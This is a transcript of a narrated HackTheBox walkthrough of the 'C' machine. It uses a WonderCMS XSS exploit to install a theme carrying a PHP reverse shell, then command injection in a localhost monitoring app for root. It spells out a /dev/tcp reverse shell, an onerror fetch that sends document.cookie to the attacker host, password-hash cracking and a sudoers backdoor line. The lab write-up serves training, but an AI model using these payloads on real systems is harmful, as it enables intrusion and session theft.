What's going on YouTube? This is Ipsec. We're doing C from HackTheBox, which starts off with hacking a WonderCMS web server. Now, identifying its WonderCMS can be a little bit tricky, but I'll show a few ways to do that, all centered around enumerating the themes. But once you do that, you can find a proof of concept exploit script on GitHub. You pull that down, and when you try to run it, it doesn't work. You have to make a few modifications because the XSS payload just isn't working. But once you do that, you get a shell on the box, and then the next step involves finding a command injection in a web server that's listening on localhost. In the Beyond route, we'll go really look at the cross-site scripting because it's relatively interesting. So with all that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory and call it C, and then the IP address of 10.10.11.28. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache, also running on Ubuntu. And looking at the scripts, we can see the title of the page is c-home, and then the cookie is PHP session ID, so we definitely know this is a PHP web server. And nmap's also telling us the HTTP only flag is not set. So if we have some type of cross-site scripting vulnerability, we could steal the cookie that way. So let's go ahead and take a look at the website. So let's do 10.10.11.28. And we get the page, welcome to C. It looks like it's a sign up for some type of biking competition. If I go over to how to participate, we have this link that directs us to contact.php. It's in the bottom left of my screen. And it's telling us the website is c.htb. So let's go ahead and add that to our host file because we don't have DNS. So let's do 10.10.11.28 c.htb. There we go. And we could click this link to see what it is. It's a contact form. But before we get too far into it, I always like having recon running in the background. So let's go ahead and start up a GoBuster. So do GoBuster directory URL http chb wordlist opseclist discovery, web content, raft, small words dot text. And then we'll give it the extension PHP because these are PHP files. And I'm going to call this root.gobuster because this is like the root of the directory, right? So now that we have GoBuster running, let's go ahead and take a look at this form. So we can do name, we'll do ipsec, email root at ipsec.rocks, age, we'll do 30 USA, website, let's link it back to us and see if anything happens. So we'll do 10.10.14.8. I'm going to do port 8000. And I'm just going to start up a netcat listener on port 8000. The reason why I like using netcat instead of like Python's HTTP server for the initial thing is I like being able to see all the headers that the client connects to us with. And if I just do simple HTTP server, we can't see that, right? So we have get, host, connection. User agent is going to be just a typical web browser. Nothing too interesting there. So we can make a request come back to us. We know it is going to be Linux. We could look for like some type of browser exploit, but this is an easy box on HackTheBox. And typically that is going to be way out of scope. It's not that easy to hack browsers. So I don't know exactly what else we could do. It looks like they are clicking links. I guess we should find out more about this actual website, right? So if I look at the source code, I'm going to try to identify if this is running like a CMS or something like that. We can see right off the bat, the style sheet is going to themes, bike, CSS, style.css. And normally when I see directories like themes, I don't think this is hand jammed PHP. And by that, I just mean like a PHP script with no like framework or something. So I'm guessing this runs something. I'm not sure exactly what it is. And if the theme didn't stick out directly to you like that, another good place to look is if you go to the target on burpsuite. Then you can go here and kind of see it here. If we go themes, bike, we have CSS and image. It doesn't show us anything because by default, CSS files are hidden. We can unhide it and then see like that, right? So we could probably enumerate like this theme's bike directory for files. We could also just look at this theme. And assuming this is going to be open source, we could take something here that looks somewhat unique, maybe like this WebKit animation thing. I'm going to go to raw, so we can copy this. So we just have this exact string. And then I'm going to search GitHub for this. So let's go to github.com, and you'll have to be logged in now to do this. You can't do it when you're not logged in, but It's free to have a GitHub account. So we'll search. And then if we go over to code, we have 18 hits. So this string appears in 18 repositories. If we go to the first one, we have this bike. And if we click here, we can see it looks pretty much exactly like the site, right? And it is the WonderCMS bike theme. So chances are this is going to be WonderCMS. And we could also look at the bike directory for these type of files. So if we went to, what is it? It's themes, bike, and then let's go to readme.md to see if this file exists. It looks like it does. So if you did not search this way, right, you could do a Pharaoh buster. So if we just did like Pharaoh buster u http c.htb, the word list is in not a normal place. Let's do op sec list discovery web content raft small. We could do raft medium dictionaries. Eventually, this may find it. But I find Pharaoh Buster, the reason why I don't show it in a lot of videos is because it is a recursive scanner, which means it's going to go into every single directory it finds and then scan those. And this can take a relatively long time to run, right? You could also just go, let's do go buster u http to 1010. Oh, we should do chttb themes bike and then word list op sec list discovery web content raft small words text. And I'm going to kill these these scanners, because if I have 3 scanners running at once, it's going to go pretty slow because I'll like denial of service my connection. Let's see, go buster directory mode. How long is this going to take to run? I wish it gave a better idea. Oh, we have /license. So this came off right the bat. So if I go over to bike, we do /license, we can see the copyright, turbo black. And if we went to like GitHub, that's probably going to be a user, turbo black, and then find it this way, right? So WonderCMS theme here. And then you could guess there is probably a readme.md file that's not in the raft small words. I think that's on like a quick hits list. So this is another thing that would be important to run. If you only go buster and only use like raft small words every single time, you're going to miss some files. Like readme.md is a really common one, right? So if I just look at raft small words or all of raft, that doesn't get hit at all. I think there is a quick hits. So you may also want to combine word list and use different ones. So like the readme would be on quick hits. And if I look at what that readme is, let's do curl CHTB themes bike readme MD. We can see it is telling us it's the Wonder CMS bike theme. So there's 3 ways we can find out that we're running on WonderCMS, just based upon finding the theme directory and then discovering the theme points references to it. I don't think there's any references to like WonderCMS on the source code here or this how to participate page. The only place I found it was on the actual theme itself. So with that being said, let's look for exploits here. So if we do WonderCMS exploit, we can find, let's see, this is a cross-site scripting vulnerability in 320 to 342 that allows an attacker to execute code. So if we go to this script, they have exploit.py. So let's grab this and look over it. So I'm going to v exploit.py, paste this, and see what it does. And let's see, I'm just going to execute it real quick, because if we don't give it the right arguments, it tells us. So we want to give it a URL, IP address, and port. I'm guessing this is going to be where we send the reverse shell to. And we probably don't want WonderCMS here. It's probably just /login URL, right? Let's go C login URL. Okay. Let me just double check that WonderCMS doesn't exist. WonderCMS 404 not found. So we definitely want just the login URL. So we'll probably do HTTP CHTB login URL, and then 10, 10, 14, 8, 9001, right? If we run the script, it tells us it creates xss.js, execute this in another terminal, and send this link to the admin for them to click on. So this looks like it's going to be some type of reflective cross-site scripting because they're clicking on a link and we're injecting HTML through that link. So it looks like something is reflecting to the page. So let's look at what xss.jss is real quick. And the way this is coded is not going to be straightforward. At the end of the video, we're going to spend a bit more time going over this exploit because I think we can make it a lot more simple. But when I was initially doing the box, I'm just going to show you the path I went through. So first we get the URL. It's going to be c.htb/login URL. Now we're doing this URL without log. I don't know all these are doing. So I guess this is making sure we only grab c.htb and then base. I think this is wrong. And we'll find that out in just a little bit, I guess. The token, it's going to go in and grab a field called token that's in the source code. So this is going to be some type of cross-site request forgery token, right? So in order to do this next thing, we're directing them to install a module. We're pointing it at this. We'll have to download the zip file and host it ourselves because the box can't reach out to the internet. But right here, it has token. So if our token doesn't match what's on the page, it's going to reject the request because that's how cross-site request forgery tokens work. And it's unique every time the page loads. So we have to make sure we grab that token. Now we're going to do a GET request to the URL reverse. What is that? So URL reverse is them installing it. So we say, hey, go install this. And then once that's true, we're going to check if this exists. So we installed a theme. And then we're going to go and request a file that is inside of that theme. So let's go ahead and walk through this. The first thing we have to do is switch out that install module for our URL. So I'm going to grab GitHub on XSS, and let's go ahead and download this file. And we're going to do make dir dub. I'm going to move exploit into this directory, and we can do wget. Okay. And if we unzip main.zip, we can see what it is. If we just go in rev shell, then rev.php, we have a PHP reverse shell. So, okay. Let's remove rev shell main. We don't need that directory. I'll open up exploit.py. And let's see, we want to replace this with our IP address. So let's get rid of HTTPS. And then I'm going to do 10.10.14.8, port 8000, main.zip. That looks good. And I also want to look at one other thing I showed. So we'll do /XSS. I want to make sure we're getting all the pages correctly. So the easiest way to test this JavaScript code is to put it in our browser. And let's just do a head-10. There we go. If I copied it when I was in tmux edit mode, it copies all these like spaces and line breaks oddly. So I don't like copying it in tmux edit mode. I just switch out to this. And let's see, we can grab these. This should be fine. And then I'm going to press F12. We can zoom this in a little bit and go to the console. Okay. So if we see what URL without log is, that's just going to be c.htb, which looks good. If we do URL without log base, though, it's just slash. And if I look at the code, URL reverse is just doing a slash here. So we probably want this to be c.htb, I would guess. I thought, wait. Okay, never mind. I thought I had edited this install module, but the exploit script is a bit weird. Every time you run it, it creates xss.js for you, right? So I'm going to run this. We'll see if it actually works. If it doesn't, then we know we probably should play with this URL without log base, because this is just slash, and I think it wants to be c.htb. So here's the script running. It's going to attempt to write xss.js and then sends that. So that should all be good. So I'm going to run this. Let's see. There we go. That looks good. We need to copy this. And we'll go over to the how to participate, contact, and then refill out this form. Paste this, submit, and it'll probably take about 60 seconds. I always like giving it 2 minutes when I test for cross-site scripting. So let's just do sleep 120, and I will resume once we get a hit, because I'm assuming it will hit us, and then I don't think we're going to see it ever make a request to install the, what is it, main.zip. So if I go in dub, let's just make sure XSS has been edited. We do 10.10.14.8, 8,000 main.zip. Yep, that's done. So we're just waiting on the bot to hit the page. So I'm going to pause the video and we'll resume once it happens. Okay, we have a hit. It hit xss.js, but we never saw anything hit main.zip. So I'm going to assume that the cross-site scripting request failed, and it probably failed because of that URL that we looked at before. So let's go ahead and go back into our console window. Do we have it here? We don't. It's probably on this contact form. If I hit up, there we go. So what I want to do is, instead of saying path name, we can change it to probably say host name, because I'm assuming URL without log base just wants the host name of the box. If we do without log base c.htb, so that looks good. What if we did host? Is host also a thing? Let's see, URL. JavaScript is magical. Like, as I hit a host name, I was like, I was pretty sure that parameter was host, not host name, but I guess they're both the same. So let's go ahead and change that, right? Because all path name is giving us is slash, and that's definitely not good. So I'm going to edit the script. Let's do v exploit.py, and where it says path name, I'm just going to put host name. And that should make this URL reverse c.htb/install module. So I think that's where it was having issues. So let's do that. And then we can send this form again. Maybe we should just use burpsuite at this time to fill out the form. Could be a little bit quicker. If this doesn't work, then I probably will. Website, we want to give this link. Paste it in. And the big painful thing, oh wow, that was quick. And it didn't get the new one. Oh, there we go. It just hit main.zip. Awesome. We're not getting a shell though. And I'm not sure why. So if we look at this, it's trying to hit c.htb themes reverse shell rev.php and then sending lhost and lport. For some reason, that did not work. Let's see if this file exists on the box. So I'm going to go themes rev.php. It looks like it did, right? And this is the, let's unzip that file again. We can go over the arguments. So if I look at rev shell main, rev php, it's not edited to have our IP address here, but there are arguments lhost and lport in the reverse shell to send it. So let's put those in. So I'm going to do lhost is equal to 10.10.14.8 and lport is equal to 9001. Let's make sure we're listening. We are. And we get a shell. Awesome. So let's fix our TTY. So we'll do Python 3, import pty spawn, then bash, like that. stty raw minus echo foreground, and then export term is equal to xterm. That lets us clear the screen. And let's see, where are we? The first thing I always like doing is going in the web server and finding out the database, right? So let's go probably var. Actually, let's do etc Apache 2 because we know this is Apache web server, so we can just do sites enabled c.conf. I was gonna guess it was in var dub, but I always like showing the foolproof way to do it. Look at the Apache config, find out the document root, and then we can access it that way, right? So let's go cd var c. And then let's see, we have contact PHP, index, PHP, plugins, themes. Let's go to data. I guess this is a flat file. We have last logins, and we have a password hash right here. So let's go ahead and grab this password hash. And I'm going to go into the Kraken, which is just a machine on my network. You can run Hashcat on your host machine. I don't recommend running Hashcat in a VM because it goes really slow in a VM. So let's do v hashes. I'm going to call this C. We'll paste this in. And then we can do hashcat hashes opt word list rocku.text and let it do the auto detection magic it does. Which it did not do. Let's see. No hash mode. V hashes C. I'm surprised that didn't work. Let's do example hashes. This is going to be like some form of bcrypt, I believe. Bcrypt. Probably 3200, I'm guessing, like $2 something dollar. This looks fine. I'm going to do mode 3200 and we'll see. Dash mode 3200. The hashes on 1 token length exception. Y10. Did I not copy the whole thing? Let's see. Let's go back to our netcat. Oh, I bet these are escapes. That's probably it. Let's see. Get rid of that escape. Get rid of that. Let's have it auto detect again. Let's see if it detects it. Okay, that's looking better. So it is probably mode 3200. There we go. And the reason why I decided it was probably going to be an escaping issue is because it was in double quotes. And whenever I see double quotes, I look at like special or odd characters like backslashes as escapes. If it was a single quote, I probably wouldn't think that. But being double quotes is what like made me start going down that path in my mind. So if we look, we have recovered the hash and the password is My Chemical Romance. So we have this password that it gets us into the CMS, the WonderCMS. We could also look at etc passwd, grep for every line that ends in sh for users. And we can start trying passwords like a May, put My Chemical Romance, and we get logged in. So that is where user.txt is. If we do sudo-l, put this in, and a may not run commands on C. So let's look at what programs are running. And if we do etc fstab, the hide PID is set, so we can't see processes by other users. Let's look at what ports are listening, and we see something on port 8080. There's also 45087, maybe. I'm going to look at what these ports are. So I'm going to go in Etsy. I'm going to grep -R for this port. And then let's hide error messages. And it looks like my shell has just died. Oh, it came back. Nothing there. Let's look at port 8080. And let's see. We have systemd monitoring service. So this is probably going to be what is listening on port 8080. Let's cat this file. And we see this is a PHP interpreter running on localhost 8080. And the directory is root monitoring. So we can't interact with this service directly. Or I mean, like, we can't go into root monitoring. But what we could do is set up a port forward and access this, right? So I'm going to do SSH AMA at 10.10.11.28. Let's do a local port forward. I'm going to listen on port 8081 because burpsuite is listening on 8080. We're going to send everything we send to 8081 through localhost on SSH and direct it to 8080 on the other end. And the password is my chemical romance. Logged in. So now we should be able to go to 127.0.0.1, port 8081. That'll send it through a SSH connection and 8080 on the host. And we want username credentials. Let's do AMA, my chemical romance for the password. And we get logged into this system monitoring. So we have disk usage, system management, analyze log file. If we click analyze log file, it's going to display a bunch of things. So let's go ahead and intercept this. So we can do intercept on, analyze. Okay. And let's see. If I do, I want to always go to this string. So what I did here is I searched for this. I put it on auto scroll. So that way when I refresh, oh, it goes to the top. Let's see. That should be fine. We can just scroll down a little bit. So my first thinking is we probably want to, we can probably go to the bottom of the list actually, because this is sequential. Less error. Okay. So maybe we can try to inject PHP into the log file. So that's what I'm going to try first. So let's just do a curl 10.10.14 or 10.10.11.28 / please subscribe. And do we see that request? We do. Awesome. So now let's put our user agent to be PHP echo hello. That's not user agent. User agent. Let's see. Let's just set a proxy. HTTP localhost 8080. It always helps to use multiple ways to do things. There we go. So now I can do PHP echo hello. I don't know why I always type the W there. That's saved. We should be able to go to the next tab, run this. That did not have it. Huh. I guess it's not a suspicious traffic pattern. Let's see. Is it looking for like suspicious user agents like curl? Okay. So we have it, and it did not execute our code. So it's not using a include, it's just doing file get contents, so it's not vulnerable. let's see. We could try like command injection, right? Let's do an ID command. And something weird happened. Disk usage, analyze log. No suspicious traffic detected. Let's see. Can we just get the root.txt? No suspicious traffic. Let's see. Etsy passwd. Can we get this? We get some things. Can we get the shadow file? Because this is running as root. We don't have root hashes here. So let's try command injection this way. Status, analyze log. Let's see. Wonder if we put a comment. There we go. So for some reason, we need to put a comment at the end and we get a output of the command we had. So let's do a reverse shell. So we'll do --c, --i, then dev tcp 10.10.14.8, 9001, 0, and 1. Let's URL encode this. And then stand up our netcat listener, run it, and we get a shell. Awesome. So now let's do Python 3, and it exits. So it looks like the shell may die pretty quickly. Run this, we get the shell. Let's see, and it exits. So let's try using a nohup. So if we do nohup, we'll put the plus there to URL encode, plus ampersand, URL encode that. Is that going to give us a better shell? It helps if I type nohup correctly. Maybe not. Let's see. I'm going to un-URL encode this. That looks fine. What if nohup's like not on the box? We'll put it here. Okay, I'm going to give it a couple seconds. And it doesn't look like our shell is dying anymore, which is good. So there was something that was just killing our process very quickly. And what I was doing is I used nohup, which allows me to fork out of the process. So I'm no longer tied to it. So now if I go to root, we can get root.txt. Awesome. Let's fix our terminal. So Python 3 import pty spawn, ban bash, like that. st2i raw minus echo foreground, then export term is equal to x term. So I want to see exactly what's killing it. So this is all like beyond root. I want to just look at things that made me curious when I was solving the box. I'm going to do psef -forest, and this is going to help me find other things on it. So we probably should set our terminal size, right? So stty-a rows 28 columns 110, stty rows 28 columns 110. Let's do this psef again. I can also do less -S, so we can go left and right, hopefully. Yes, we can. So let's see. It's probably going to be this monitoring watchdog. Right now it's in sleep. Let's see exactly what this is doing. I'm going to cat this script, and then it's always going to make a request here. Unauthorized. Let's echo what the exit is. So if the exit code is not 0, then it's going to restart the monitoring service. So what's happening here is this process on port 8080 is probably running as PHP, right? Let's see. Port 8080. It's funny it's left. I wonder if it's screwed up because of my nohup, because that should be the PHP service. That was in this pane. We cat this file, right? So this is not going to be a threaded web server. Normally, like, you don't expose the PHP interpreter or Python interpreter straight to external users because there's only so many like connections it can process at once. Most likely it's just going to be one, right? So when we do the reverse shell, we're actually hanging that web server because it's not threaded. So let's test that theory. We have this curl, right? So I'm going to go back to my request. Let's remove the nohup. So this is going to take us out. Let's see. Is this? That's the ampersand, right? Yeah. So if we do nc lvnp 9001, make this request, that's unauthorized. Send it. We got it. 1 Mississippi, 2 Mississippi. Now it fails because, again, it just took 2 seconds to run. And then if we, oh, that's rude. It killed my whole shell. Let's get this back, because we still need that to finish the video. There we go. Python 3, port pty spawn, then bash, UI raw minus echo, 28110. Okay, so where were we? Term is equal to x term. It was like root monitoring service, right? Scripts. Okay. So we're doing the curl, max time. So we failed. So it's now going to restart the monitoring service and then wait 30 seconds before doing it again. So that is why we have to nohup, because when we hang the web server, bad things happen, right? Now you could, if you didn't want to do this nohup, you're running commands as root, right? So you can do anything you want. Another alternative would be like edit the sudoers file. So if we cat etc sudoers, we can cat it on our box, sudo cat etc sudo, or we can just do it here. So let's say we didn't want to reverse shell, but since we had a shell already, we're free to cat etc sudoers. Is this going to display? It does. So all we want to do is add this line for Amy. So I'm going to echo this line to etc sudoers, and we're going to do a may like that. So now if I do sudo su, put in the password of My Chemical Romance, we can get root that way, right? And since we're not really creating a persistent connection, the web server is none the wiser, so it never restarts the service. So that's 2 ways we can go about getting that shell. Now, the other thing I want to look at is exactly how that cross-site scripting thing works, right? So let's look at where the bot is running. It's going to be a cron somewhere. So it's not in cron tab. Not there. Var spool cron tabs. Nothing in root. Okay. So home geoscripts contact.py is probably going to be the bot. So we can see exactly how this works. So we have this XSS function, and that's just going to go to login URL, going to log in. And then on main, it's going to read files out of var wwc messages, and then just open a web browser to that page. Okay. So we don't really need to look at that script all that much. So let's go back, and we can log in to the box and see exactly how this works. I'm going to go c.hdb. There's all those. Am I intercepting right now? I am. Turn it off. It was what? Login URL, My Chemical Romance. So this is going to be a really odd thing. So whenever a page is sent here, so if I do page is equal to IPSEC, it gets reflected here, right? But if I wasn't logged in, let's just open a new window. It doesn't get reflected because we get a 404 page. So that's why it's really painful to play with this cross-site scripting ourselves. Normally when we do cross-site scripting, we can just do it on a browser, test it, and find out exactly why it's not working. But in this case, we couldn't because in order to trigger the payload, you have to be logged in. So I wonder if we just do bold/bold. User B doesn't exist. Is that, do we have it? So this is where we injected right now, right? We have this CHDB bold IPSEC. So what the payload is doing is putting a single quote and that to escape it. And then I think it did like that or something, right? So now let's look at exactly what our thing looks like. So we have canceled out of the form action. And then we kind of broke that. But we have straight HTML here. So we can probably just do image source at this point. So if we do image source is equal to HTTP 10.10.14.8 port 8000 / IPSEC. Does this work? Am I listing on 8000 somewhere? Probably am. There we go. So we make a connection. So we have cross-site scripting there. Do I even need? I wonder if that would work with just that. No. So we definitely need to escape out of the form. So we know how the cross-site scripting works. Let's look at the payload we're using. So we're instructing the user's browser to go into themes and then pretty much the copy of this install link, right? So if we paste that, we can see exactly what it is. c.htb install module, and then paste this, the directory name, the type is a theme, and the token. So let's go ahead and make our own XSS payload. And it's going to be a lot simpler than what they had, right? So let's go. I'm going to rename revshell main to IPSEC. And then we'll zip-r ipsec.zip. So now we just rename the shell because I think we do var c and go into themes, like revshell main exist. I want to make sure we have a new directory. Okay. So I'm going to call this pwn.js. And then what we want to do is grab the cross-site scripting token. So we'll do document query selector name is equal to token dot value. And I just want to double check this works, right? So we can grab this, go over here, open up our window, look at what token is. There we go. That looks good. So we have the token. Now we just want the payload. So we'll do var payload is equal to. I'm going to copy this link. And then all I want is that. And I'm going to get rid of token, or the value at least. And we're going to do token like this. So we're just putting that variable there. And then the payload, install module. Will be 10, 10, 14, 8, 8000. I think we called it ipsec.zip. Directory name, I'll leave it as sky, type theme, token. That looks good. So now all we have to do is instruct the user's browser to do this. They had used a like XML HTTP request. I'm just going to use the fetch because I find the fetch logic more simple. So going to fetch slash and the payload. We don't need the question mark. There we go. So that's going to do a like open the web browser, right? It's going to go to that page. I'm going to tell it to do a GET request. Then I'm also going to set the mode to no cores. If I don't do this, then it's going to like send an option request to identify what verbs my web server accepts, like if it's get, post, whatever. So I like saying no cores so it doesn't do that. Then we want to put a credentials to include. This is going to include the PHP session ID, right? And then we can do headers. This is a GET request. We don't need to set the header. If we were doing a post request, then we would. We have to set the application xwww URL form encoded, but we're not setting a URL form. So I think that's pretty much it, right? I think this is all we need for the cross-site scripting. So we'll save this. We got pwn, okay, Python 3, HTTP server, and we're going to have our web browser do this. So we're going to go to page, we're going to close out, and then we can do script source is equal to HTTP 10, 10, 14, 8, 8000 pwn.js. And then we can try to start the thing better. I'm going to put this on intercept mode so we can see things. Okay. So I'm going to intercept the response to this so we can see it. So we make the request to this, which is going to put the cross-site scripting on our page. We can see right here, if I go pwn.js, script source, HTTP 1010, whatever, like this. So we haven't had the request yet. Now I'm going to forward this. And now our browser made a request to pwn.js. And it doesn't look like we did a fetch. So let's go open up our browser, go to console, and let's see. Read out declaration of var token. I wonder if that's because we had like assigned things. We're just going to do it on a new window. So this should be a whole new pane. Query selector is null. Token, undefined. Cat. Is that not right? Var token, document query selector. We have something wrong. Oh, they used query token all. I wonder if that's the issue. Undefined. I wonder if that token's only on the login URL page. That could be. Like maybe the CSRF token isn't even there. Let's see. I don't have the web server running right now. Let's run this again with the login URL there. So intercept the response forward, and we have token. So we do have a token. It's going to be 3D whatever. So I'm going to forward this. And it still fails. Let's take a look at the script again. Oh, could this be something as silly as not putting semicolons in the end? That's very likely the problem. Let's run this again. I'm going to be sad if that's it. Intercept on, refresh, forward. That is not it. Token's undefined. I bet if I grab the token, it'll work, right? No. Let's just use the one they're using in Pwn. They called it XSS. Let's see. Oh, they do query selector all. Still undefined. What are we doing wrong? I think they actually had like a question mark after this. Is that it? It must be how we're like building the form. So what I'm going to do is use their exact payload. Let's do Python 3 exploit.py. Like this. It's probably because they actually rebuilt the form and we destroyed it. That's going to be my guess. Let's just add that real quick. They do login URL, question mark. That should be fine. Is this the problem? Why is this becoming so tricky to make? And do a new tab, login URL. Let's just copy their exact payload. And then I'm going to replace XSS with Pwn. Like that. There we go. So it must be how, like, when we're rebuilding the form, we got, like, screwed up. Because now this works. And I bet if I go in themes, we now have IPsec. So we show what a browser is exactly doing. We can turn intercept back on and walk through it. So first we make the request. This is going to be to pwn.js. So we're going to forward this. And did we just not oh, we're not listening. Okay. refresh. Forward, we should see pwn.js. I'm guessing we don't intercept that one. But here we go. Our browser is now requesting to install the module. So that's how the exploit works, right? This was somewhat tricky to get working because we had to build out this form. Now, the easier route would have been if we look at the source, or like if we looked at nmap, the cookie wasn't stored HTTP only, right? If we look here, HTTP only is false. So we could just use like an image source tag to exfil all this. And that makes it a lot easier to do, right? So we could just build a payload. I'll do this all in burpsuite. We'll say login page is equal to nothing. Let's just get a clean request. Intercept on. Stupid autocomplete. Okay. So what I'm going to do is we close out the form, and then we can do image source is equal to X. And then on error, we do a fetch. So I'm going to do fetch HTTP 10.10.14.8 port 8000. And let's see. I'm just going to do XSS test real quick. Let's make sure this works. You do fetch. That looks fine. I'm actually going to do single quotes around the URL. And I'm going to put the whole on error within quotes. You can close out the image tag. And this hopefully is good. I'm going to copy this. Let's just clear the screen to get everything good. And I'm going to paste this. Index.php. Send. And we have now made a request to XSS test. Awesome. So all we have to do now is add the cookie portion. So I'm going to do $C, and then we'll do plus, then B to A. So is this going to give us base64? And we can say document.cookie like this. So let's send this page now. What did I copy? Up to index. Paste that. And we didn't get anything. And looking at it, it becomes very obvious. We didn't URL encode, so the plus got translated to a space, right? So we want to URL encode the plus, which I believe is 2B. We could probably just go in repeater. Highlight, Control U. It is 2B. So let's just close this out. And then I'm going to go to the plus, %2B, send that. And there we go. We have a very base64 here. So if I copy this, then we can echo base64-D, echo-n. Did I not copy the whole thing? That is not what I expected. 2B, B2A. What's my cookie look like? D6. If I get rid of B2A. I wonder if it's A to B. Just send document cookie. Does this send? Okay. So we have the PHP session here. So with that, we could have just edited our session, add the PHP session here, and then install the theme manually. Instead of like using the cross-site request to instruct the user's browser to install the theme, we can just do a like session replay attack and take their session and have admin to the CMS herself, right? That also works. Let's see. JavaScript base64 encode. Did I do this wrong? B2A. I did not. 2B, B2A, document cookie. NC LVN. I think I know what's happening. Is something getting URL encoded? No. I am honestly not sure why that's not working. Let's see, bcode as. Yeah, I'm doing something wrong with that. Not exactly sure what I'm doing wrong. Or maybe you can't just do B to A on cookies. Weird. Well, I'm not going to solve that right now. Let's just grab this, and I'm going to steal the cookie of the bot, and then we'll call that a video. If I run netcat like this, session cookie works. Okay. So let's log out. Go to how to participate, contact form, website. That is good. Let's do this. Submit. Form submitted. So now we just have to wait for the bot to kick off. Let's see. su-geo contab-l. We can probably just run the script ourselves to speed things up. Should be logging in. There we go. So now we have their PHP session ID. So we could go to our browser. Let's go to storage. Put their session in. Refresh. And now we're logged in as the application that's using like the web bot, right? So that'd be another way to do it. If you didn't want to do the whole cross-site request chain attack, it's much easier to just steal the cookie because HTTP only is not set. But hopefully you guys enjoyed that video. Take care, and I will see you all next time.